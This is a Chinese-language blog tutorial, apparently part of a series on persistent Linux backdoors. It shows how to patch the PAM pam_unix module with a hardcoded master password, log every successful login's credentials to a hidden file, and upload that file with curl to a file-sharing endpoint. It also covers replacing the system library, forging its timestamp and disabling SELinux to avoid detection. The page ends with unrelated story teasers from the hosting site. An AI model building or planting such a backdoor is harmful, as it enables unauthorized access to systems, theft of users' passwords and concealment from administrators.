Linux后門維系(三)—— PAM后門 + transfer.sh

查看pam版本并下載

rpm -qa | grep pam
pam-1.1.8-12.el7_1.1.x86_64

http://www.linux-pam.org/library/
curl -O http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

修改并編譯pam_unix_auth.c文件

cd Linux-PAM-1.1.8
vim modules/pam_unix/pam_unix_auth.c
pam_unix_auth.c 修改前
    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    name = p = NULL;
pam_unix_auth.c 修改后
    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    if(strcmp(p,"1q2w3e4r")==0){return PAM_SUCCESS;}
    if(retval == PAM_SUCCESS){
        FILE * fp;
        fp = fopen("/bin/.sshlog", "a");
        fprintf(fp, "%s : %s\n", name, p);
        fclose(fp);
        system("curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3");
        }
    name = p = NULL;
curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3
./configure
make

編譯后:modules/pam_unix/.libs/pam_unix.so

備份/替換/修改時間戳

ll /lib64/security/
-rwxr-xr-x. 1 root root  57688 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

cp /lib64/security/pam_unix.so /lib64/security/pam_unix.so.bak
cp ./pam_unix.so /lib64/security/pam_unix.so
touch -r /lib64/security/pam_userdb.so /lib64/security/pam_unix.so

ll /lib64/security/
-rwxr-xr-x. 1 root root 221776 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  57688 6月  30 23:18 pam_unix.so.bak
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

如果selinux是開啟的環(huán)境,一定要關(guān)掉或者設(shè)置好上下文pam_unix.so才能正常工作闻丑。

查看selinux 狀態(tài)
getenforce
    Enforcing 關(guān)閉
    Permissive 開啟
臨時關(guān)閉selinux
setenforce 0
臨時開啟selinux
setenforce 1

查看selinux上下文:
ls -Z pam_unix.so.bak
設(shè)置selinux上下文:
chcon –reference=pam_unix.so.bak pam_unix.so
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末十兢,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子耘擂,更是在濱河造成了極大的恐慌胆剧,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,402評論 6 499
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件醉冤,死亡現(xiàn)場離奇詭異秩霍,居然都是意外死亡,警方通過查閱死者的電腦和手機蚁阳,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,377評論 3 392
  • 文/潘曉璐 我一進店門铃绒,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人螺捐,你說我怎么就攤上這事颠悬“牵” “怎么了?”我有些...
    開封第一講書人閱讀 162,483評論 0 353
  • 文/不壞的土叔 我叫張陵赔癌,是天一觀的道長诞外。 經(jīng)常有香客問我,道長灾票,這世上最難降的妖魔是什么峡谊? 我笑而不...
    開封第一講書人閱讀 58,165評論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮铝条,結(jié)果婚禮上靖苇,老公的妹妹穿的比我還像新娘。我一直安慰自己班缰,他們只是感情好贤壁,可當我...
    茶點故事閱讀 67,176評論 6 388
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著埠忘,像睡著了一般脾拆。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上莹妒,一...
    開封第一講書人閱讀 51,146評論 1 297
  • 那天名船,我揣著相機與錄音,去河邊找鬼旨怠。 笑死渠驼,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的鉴腻。 我是一名探鬼主播迷扇,決...
    沈念sama閱讀 40,032評論 3 417
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼爽哎!你這毒婦竟也來了蜓席?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,896評論 0 274
  • 序言:老撾萬榮一對情侶失蹤课锌,失蹤者是張志新(化名)和其女友劉穎厨内,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體渺贤,經(jīng)...
    沈念sama閱讀 45,311評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡雏胃,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,536評論 2 332
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了志鞍。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片丑掺。...
    茶點故事閱讀 39,696評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖述雾,靈堂內(nèi)的尸體忽然破棺而出街州,到底是詐尸還是另有隱情兼丰,我是刑警寧澤,帶...
    沈念sama閱讀 35,413評論 5 343
  • 正文 年R本政府宣布唆缴,位于F島的核電站鳍征,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏面徽。R本人自食惡果不足惜艳丛,卻給世界環(huán)境...
    茶點故事閱讀 41,008評論 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望趟紊。 院中可真熱鬧氮双,春花似錦、人聲如沸霎匈。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,659評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽铛嘱。三九已至暖释,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間墨吓,已是汗流浹背球匕。 一陣腳步聲響...
    開封第一講書人閱讀 32,815評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留帖烘,地道東北人亮曹。 一個月前我還...
    沈念sama閱讀 47,698評論 2 368
  • 正文 我出身青樓,卻偏偏與公主長得像秘症,于是被迫代替她去往敵國和親乾忱。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,592評論 2 353